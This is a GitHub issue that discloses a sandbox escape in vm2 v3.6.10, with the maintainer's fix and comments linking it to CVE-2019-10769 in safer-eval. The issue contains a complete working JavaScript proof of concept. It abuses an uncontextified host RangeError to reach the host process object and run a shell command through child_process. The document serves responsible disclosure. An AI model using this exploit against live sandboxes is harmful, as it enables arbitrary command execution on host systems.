Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Breakout in v3.6.10 via Maximum call stack size exceeded RangeError #197

Closed
XmiliaH opened this issue Apr 7, 2019 · 3 comments
Closed

Breakout in v3.6.10 via Maximum call stack size exceeded RangeError #197

XmiliaH opened this issue Apr 7, 2019 · 3 comments
Labels
bug confirmed

Comments

@XmiliaH
Copy link
Collaborator

XmiliaH commented Apr 7, 2019

It is possible to almost anywhere generate a RangeError: Maximum call stack size exceeded. Sometimes the RangeError will be a host RangeError which is not Contextified.
I tried to make the code as stable as possible.

"use strict";
const {VM} = require('vm2');
const untrusted = `
const f = Buffer.prototype.write;
const ft = {
		length: 10,
		utf8Write(){
			
		}
}
function r(i){
	var x = 0;
	try{
		x = r(i);
	}catch(e){}
	if(typeof(x)!=='number')
		return x;
	if(x!==i)
		return x+1;
	try{
		f.call(ft);
	}catch(e){
		return e;
	}
	return null;
}
var i=1;
while(1){
	try{
		i=r(i).constructor.constructor("return process")();
		break;
	}catch(x){
		i++;
	}
}
i.mainModule.require("child_process").execSync("whoami").toString()
`;
try{
	console.log(new VM().run(untrusted));
}catch(x){
	console.log(x);
}

I used 11.8.0.
@patriksimek patriksimek pinned this issue Apr 7, 2019
patriksimek added a commit that referenced this issue Apr 7, 2019
@patriksimek
Fixes sandbox escape (#197)
4b22d70
@patriksimek
Copy link
Owner

Thanks for the report. Fixed in 3.6.11.

@patriksimek patriksimek unpinned this issue Apr 7, 2019
@JLLeitschuh
Copy link

JLLeitschuh commented Dec 9, 2019
edited

@XmiliaH Just a heads up, your POC worked against another project as well called Safer-Eval and had the following CVE number assigned to it: CVE-2019-10769. Nice finding!

https://twitter.com/JLLeitschuh/status/1204106820115222529?s=20

Full disclosure:
https://gist.github.com/JLLeitschuh/609bb2efaff22ed84fe182cf574c023a

@XmiliaH
Copy link
Collaborator Author

XmiliaH commented Dec 9, 2019

You can break out far easier commenthol/safer-eval#10. And to get a host exceptions one can just supply a invalid argument to get a exception. Using maximum call stack RangeError is overkill.

@cristianstaicu cristianstaicu mentioned this issue Feb 8, 2021
Open
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug confirmed
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@patriksimek @JLLeitschuh @XmiliaH